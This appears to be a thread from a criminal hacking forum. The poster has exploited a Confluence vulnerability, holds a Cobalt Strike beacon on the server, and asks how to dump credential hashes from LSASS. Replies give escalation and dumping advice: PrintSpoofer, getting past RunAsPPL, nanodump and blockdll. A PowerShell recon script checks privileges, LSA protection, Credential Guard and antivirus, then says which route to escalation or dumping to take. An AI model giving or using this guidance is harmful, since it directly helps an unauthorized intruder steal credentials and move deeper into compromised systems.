
PrivEsc Issue getting hashes

wiseguy01 (ripper; flagged SCAMMER; registered 01.04.2021; 157 posts, 29 reactions, 1 deal guarantee)
Hello,

I recently found a device vulnerable to CVE-2022-26134 (Confluence). I used a base64-encoded PowerShell command to get a reverse shell and loaded a Cobalt beacon (one-liner) on it. When I try to dump hashes with Cobalt I get the error ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005).
I tried dumping lsass.exe and got nowhere.
Please tell me your ideas?

Thanks,
WG01
 
Looks like RunAsPPL is enabled on the server; try a few of the Mimikatz techniques to bypass this feature. Google is your friend here.
Also, some AV software can be involved when you see such an error. You should probably perform basic system recon before hashdumping.
 
The Confluence runs as NT AUTHORITY\NETWORK SERVICE, not SYSTEM. You need SYSTEM to dump hashes, which explains the error that mimik can't get a handle on lsass (0x00000005) (error 5 = access denied). Execute whoami /priv; you will see that SeImpersonatePrivilege is enabled. Just use https://github.com/crisprss/PrintSpoofer to get to SYSTEM; then, even if PPL is enabled, you can use nanodump.
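The "basic system recon before hashdump" suggested above, written out as an added example (not code from any poster in this thread). It runs in the beacon's context and reports the facts the replies argue about: the current identity, whether SeImpersonatePrivilege (the PrintSpoofer path) or SeDebugPrivilege (an elevated token) is in the token, the RunAsPPL registry value, whether Credential Guard is running, and which AV is registered. The registry path, WMI classes and cmdlets are standard Windows ones; the verdict logic at the end is my own mapping of those findings onto the advice in this thread. Nothing here opens a handle to LSASS.

```powershell
# Added example: pre-hashdump recon. Run as the beacon user, e.g.
#   powershell -ep bypass -f recon.ps1
# Read-only checks; no LSASS access, so it does not itself trip error 5.

$id       = [System.Security.Principal.WindowsIdentity]::GetCurrent()
$isSystem = $id.IsSystem
$isAdmin  = (New-Object System.Security.Principal.WindowsPrincipal($id)).IsInRole(
                [System.Security.Principal.WindowsBuiltInRole]::Administrator)
"[*] Running as: $($id.Name)  (SYSTEM=$isSystem, Admin=$isAdmin)"

# whoami /priv prints one line per token privilege with its Enabled/Disabled state.
# SeDebugPrivilege is absent from a NETWORK SERVICE token entirely, so its mere
# presence (even Disabled) means we already hold an elevated token.
$privText       = whoami /priv 2>$null | Out-String
$hasImpersonate = $privText -match 'SeImpersonatePrivilege.*Enabled'
$hasDebug       = $privText -match 'SeDebugPrivilege'
"[*] SeImpersonatePrivilege enabled: $hasImpersonate"
"[*] SeDebugPrivilege in token:      $hasDebug"

# LSA protection (RunAsPPL). 1 = LSASS runs as a protected process light,
# 2 = same but locked with a UEFI variable. 0/absent = not set via this value
# (newer Windows 11 builds can enable it by default without writing it).
$lsa = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' -ErrorAction SilentlyContinue
$ppl = if ($null -ne $lsa -and $null -ne $lsa.RunAsPPL) { [int]$lsa.RunAsPPL } else { 0 }
"[*] RunAsPPL registry value:        $ppl"

# Credential Guard: Win32_DeviceGuard.SecurityServicesRunning contains 1 when it is on.
$dg = Get-CimInstance -Namespace 'root\Microsoft\Windows\DeviceGuard' -ClassName Win32_DeviceGuard -ErrorAction SilentlyContinue
$credGuard = ($null -ne $dg) -and ($dg.SecurityServicesRunning -contains 1)
"[*] Credential Guard running:       $credGuard"

# Registered AV. SecurityCenter2 exists on client SKUs only; on Windows Server
# fall back to checking the Defender service.
$av = Get-CimInstance -Namespace 'root\SecurityCenter2' -ClassName AntiVirusProduct -ErrorAction SilentlyContinue
if ($av) {
    $av | ForEach-Object { "[*] AV product:                     $($_.displayName)" }
} else {
    $svc = Get-Service -Name WinDefend -ErrorAction SilentlyContinue
    "[*] Windows Defender service:       $(if ($svc) { $svc.Status } else { 'not installed' })"
}

$lsass = Get-Process -Name lsass -ErrorAction SilentlyContinue
"[*] lsass.exe PID:                  $($lsass.Id)"

# Verdict: map the findings onto the thread's advice (my own decision logic).
if (-not ($isSystem -or $isAdmin)) {
    if ($hasImpersonate) {
        "[+] Not SYSTEM, but SeImpersonatePrivilege is enabled: escalate first (e.g. PrintSpoofer), then dump."
    } else {
        "[-] Not SYSTEM and no SeImpersonatePrivilege: any OpenProcess on lsass will fail with error 5 (access denied)."
    }
} elseif ($ppl -ne 0 -or $credGuard) {
    "[!] Elevated, but LSASS is protected (RunAsPPL=$ppl, CredGuard=$credGuard): a plain handle to lsass is refused; use a PPL-aware dumper."
} else {
    "[+] Elevated and LSASS unprotected: a standard dump should work once SeDebugPrivilege is enabled in the token."
}
```

Run it before any dump attempt: the first branch of the verdict is exactly the situation described in this thread (NETWORK SERVICE with SeImpersonatePrivilege, error 5 from mimikatz), and the second branch is the one the "SeDebugPrivilege is missing / RunAsPPL" replies are talking about. If the script itself is blocked by AV, that is also an answer.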
 
zuna34, thank you very much, but nanodump gave the error [-] Could not connect to pipe: 2
 
You may need to inject your beacon into an authorized process to make nanodump work; simply bypass the DLL blocks by running this command before dumping with nanodump.

Code:
blockdll start
then
Code:
nanodump
 
Still getting the error [-] A privilege is missing: SeDebugPrivilege. Are you elevated?
 

